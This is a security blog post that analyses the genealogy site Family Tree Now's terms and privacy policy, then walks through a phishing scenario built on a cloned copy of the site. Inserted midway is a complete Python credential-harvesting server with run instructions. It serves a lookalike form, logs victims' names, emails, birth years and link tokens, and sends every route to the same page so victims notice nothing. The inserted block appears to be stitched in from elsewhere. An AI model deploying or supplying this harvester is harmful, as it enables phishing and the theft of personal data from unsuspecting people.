Phishing Family Tree Now: A Social Engineering Odyssey

Joe Gray*

You may have heard about a new genealogy tool called Family Tree Now. It is a (seemingly) 100% free tool (more on that later) that allows you to enumerate your family tree without having to enter much data (initially) beyond your name. While it can be useful – especially if family reunions are your thing, if you’re doing a school project, or if you’re trying to locate relatives – the issue here is that you are not the only one who may find it useful. As with anything, it can be used as a tool or a weapon. Just like a hammer, which one it is depends on the intention of the person holding it. Below is my analysis and application of the resource.

My Analysis

I went through the Family Tree Now site and analyzed various policies to understand how they operate and what their goals are. In the About section, they talk about the company and the culture in vague terms. This feels like marketing hype, so I didn’t spend much time there.

Terms & Conditions

In the Terms and Conditions [link] (T&C) section, it talks about the uses for the site, both authorized and unauthorized. This is strange to me, because the site requires no authentication, so there is no account to lock an abusive user out of, aside from the presumable ability to block an abusive IP address. In the T&C, there is a provision that grants Family Tree Now a copyright on any data input into the system, which essentially allows them to copyright YOUR family data.

In terms (see what I did there?) of use, the T&C lays out the following requirements:

  • Only for appropriate, legal purposes, and in compliance with all applicable federal, state and local laws and regulations
  • Obtain any and all necessary licenses, certificates, permits, approvals or other authorizations required by federal, state or local statute, law or regulation that govern your use of the Services
  • Not use the Services in a manner that may cause emotional or physical harm to anyone, or to “stalk” or otherwise harass another person
  • Not use the Services to seek information about or harm minors in any way
  • Not use the Services to seek information about celebrities or public figures
  • Not use the Service to promote or provide instructional information about illegal activities or promote physical harm or injury against any group or individual
  • Not resell any of the information you obtain from the Services without our prior written consent (They don’t like competition)
  • Take reasonable steps to ensure that the information you receive from the Services is stored in a secure manner

Privacy

In a nutshell, they collect information via account registration, interactions with features/functionality, “cookies and other technologies we collect your IP address, device identifier, browser type, operating system, mobile carrier, and your ISP, and receive the URLs of sites from which you arrive on our Site,” and interactions with third party sites. This is a very broad collection campaign, which brings us back to the whole “what/who is the product” debate.

The site admits to using the data to administer your account, customize the services, create and distribute advertising relevant to your experience, send you promotional communications through email, for internal business purposes, analyze trends and statistics, for audits/to determine the effectiveness of promotional campaigns, protect the security or integrity of applications and business, and to contact you if necessary.

To sum up what you can do: review and edit information, control messages, and close your account. Notice the term is close, not DELETE. I guess they forgot about Ashley Madison.

I’m no lawyer and I possess no formal legal training or expertise, but this sounds like we are the product. There are few provisions for the security of the data collected, which is kind of logical for this type of site: that is the problem with a model that puts no barrier to entry, such as payment or authentication, in front of the data.

Monetization

Monetization is addressed in the privacy policy. Ironic? Not really. If you’re not paying for the service or product, often you become the product. This is sometimes the case even if you do pay, so do not let that aspect fool you. Michael Bazzell frequently talks about this with Justin Carroll on the Complete Privacy & Security Podcast.

OSINT Angle

This is obviously an OSINT treasure chest. It includes lots of possibly sensitive information. It is publicly available on the internet – best of all, it’s free. The only issue is that there is no API, and per the T&C, automated gathering is not permitted. From here, an attacker can confirm existing data or determine possible relationships to check out. This can enable the attacker to penetrate the inner circle of the target using different vectors and angles.

Social Engineering Angle

I have always said that genealogy websites are a hacker’s best friend when trying to social engineer beyond *ishing and when trying to reset passwords. I used to cite Ancestry.com or Genealogy.com as top leads for family oriented attacks, with Facebook being a close number 3. You can’t keep Mom or Grandma from posting those embarrassing pictures and giving a narrative, right? In the past few months, I have added stick families on back windshields and now Family Tree Now to my arsenal as numbers 1 & 2.

So what can we do with the information we gather from Family Tree Now in Social Engineering attacks? This is a near limitless list. As with most (if not all) penetration testing and social engineering engagements, time is the limiting factor. If you have enough time, you can successfully perform Social Engineering on anyone. Below is a scenario that I cooked up using Family Tree Now:

I cloned the website using Social Engineer Toolkit.

https://advancedpersistentsecurity.net/wp-content/uploads/2017/01/1.png

https://advancedpersistentsecurity.net/wp-content/uploads/2017/01/2.png

https://advancedpersistentsecurity.net/wp-content/uploads/2017/01/3.png

The resulting site is here:

https://advancedpersistentsecurity.net/wp-content/uploads/2017/01/4.png

Notice the difference between it and the REAL site:

https://advancedpersistentsecurity.net/wp-content/uploads/2017/01/5.png

At this point, I “sprung” the phishing email. Note that this is not the best email, but it is not the worst either.

https://advancedpersistentsecurity.net/wp-content/uploads/2017/01/9.png

Upon clicking Validate, the victim would see this:

https://advancedpersistentsecurity.net/wp-content/uploads/2017/01/6.png

Should they choose to opt-out, they’ll end up here:

https://advancedpersistentsecurity.net/wp-content/uploads/2017/01/7.png

If they click the link at the top of the email, they’ll simply see the landing page (above).

Should they provide any information or click any link, they end up with a “payload.”

https://advancedpersistentsecurity.net/wp-content/uploads/2017/01/8.png

Regardless of what they do, I am keeping log data (which also records any inputs they provide):

https://advancedpersistentsecurity.net/wp-content/uploads/2017/01/10.png
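As an added illustration (this is not the author's SET output and not code from the post), the following stand-alone Python script does, in miniature, what the credential harvester in the scenario above does: it serves a lookalike landing page and writes a JSON log entry for every hit, capturing both the query-string parameters carried by the email link and any form fields the visitor submits. The page HTML, the field names, the /validate and /opt-out routes, the sample IP address and the log file name are all assumptions made for this example; SET's own cloner would serve the real cloned markup and, in the scenario, a payload.

```python
"""Minimal credential-harvesting landing page with request logging.

Added example, not the author's SET clone. It stands in for the Social-Engineer
Toolkit site cloner / credential harvester used in the scenario. The page HTML,
the field names, the /validate and /opt-out paths and the log file name are all
assumptions made for the demo. Use only against people and systems you are
authorized to test.
"""
import json
import time
from http.server import BaseHTTPRequestHandler, HTTPServer
from typing import Optional
from urllib.parse import parse_qs, urlparse

LOG_FILE = "harvester.log"  # assumed file name

# Hypothetical lookalike of a genealogy "validate your record" page.
LANDING_HTML = b"""<html><body>
<h2>Validate your record</h2>
<form method="POST" action="/validate">
  Full name: <input name="name"><br>
  Email: <input name="email"><br>
  Year of birth: <input name="dob_year"><br>
  <button type="submit">Validate</button>
</form>
<a href="/opt-out?src=email">Opt out</a>
</body></html>"""


def parse_form(body: bytes) -> dict:
    """Decode an application/x-www-form-urlencoded body into {field: value}.

    parse_qs returns a list per field and drops blank values; keep the first
    value of each field so an empty "dob_year=" does not appear in the log.
    """
    return {k: v[0] for k, v in parse_qs(body.decode("utf-8", "replace")).items()}


def make_log_entry(client_ip: str, method: str, raw_path: str,
                   body: bytes = b"", ts: Optional[float] = None) -> dict:
    """Build the record written for every hit, whatever the visitor does.

    Query-string parameters (e.g. a per-recipient token in the email link)
    and any POSTed form fields are both captured, which is the point made
    in the text: there is no "safe" click on the landing page.
    """
    url = urlparse(raw_path)
    when = ts if ts is not None else time.time()
    return {
        "ts": time.strftime("%Y-%m-%dT%H:%M:%S", time.gmtime(when)),
        "ip": client_ip,
        "method": method,
        "path": url.path,
        "query": {k: v[0] for k, v in parse_qs(url.query).items()},
        "form": parse_form(body) if body else {},
    }


def write_log(entry: dict, path: str = LOG_FILE) -> None:
    """Append one JSON line per request (JSON Lines is easy to grep later)."""
    with open(path, "a", encoding="utf-8") as fh:
        fh.write(json.dumps(entry) + "\n")


class HarvesterHandler(BaseHTTPRequestHandler):
    def _log_and_respond(self, body: bytes = b"") -> None:
        entry = make_log_entry(self.client_address[0], self.command, self.path, body)
        write_log(entry)
        # Every route ends on the same landing page, so the visitor sees
        # nothing unusual no matter which link they followed.
        self.send_response(200)
        self.send_header("Content-Type", "text/html")
        self.end_headers()
        self.wfile.write(LANDING_HTML)

    def do_GET(self) -> None:
        self._log_and_respond()

    def do_POST(self) -> None:
        length = int(self.headers.get("Content-Length", "0"))
        self._log_and_respond(self.rfile.read(length))

    def log_message(self, *args) -> None:
        # Keep stderr quiet; the JSON file is the record of what happened.
        pass


if __name__ == "__main__":
    # Bind to localhost only for the demo; SET would front this with the
    # lookalike hostname used in the phishing email.
    HTTPServer(("127.0.0.1", 8080), HarvesterHandler).serve_forever()
```

Run it with `python harvester.py`, browse to http://127.0.0.1:8080/?t=abc, submit the form, and `tail harvester.log` shows one line per hit with the token from the link and the submitted fields. The design choice worth noting is that the logging happens before any branching on the route: the opt-out link and the Validate button are logged identically, which is exactly why "opting out" of a phishing page gives the target nothing.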

Conclusion

In conclusion, the attack vector that I outlined is not unique to Family Tree Now. The timing of the attack is why I found it interesting. Because the site is expected to be asking for intimate and personal information, people who end up on the site are more apt to click one way or the other. Not having an API slows the attacks down from the site's perspective. I feel that if authentication and/or payment were required, this would be much less of an issue. I have been singing the praises of using Ancestry.com for a while.

This is not really much different than using IntelTechniques or OSINTFramework for gathering OSINT on targets. Nor is this much different than Social Media. This will work as an excellent tool for validating and confirming the data that has already been gathered and when coupled with the social engineering attack, the success rate of any data gathering and payload delivery is amplified.

__

*A Guest post from Joe Gray, CISSP-ISSMP, GSNA, GCIH

Joe Gray joined the U.S. Navy directly out of High School and served for seven years as a Submarine Navigation Electronics Technician. Joe is an Enterprise Security Consultant at Sword & Shield Enterprise Security in Knoxville, TN. Joe also maintains his own Blog and Podcast – Advanced Persistent Security. He is also in the SANS Instructor Development pipeline, teaching SANS Security 504: Hacker Tools, Techniques, Exploits, and Incident Handling. In his spare time, Joe enjoys reading news relevant to information security, attending information security conferences, contributing blogs to various outlets, bass fishing, and flying his drone. Follow him on Twitter and see his profile on LinkedIn.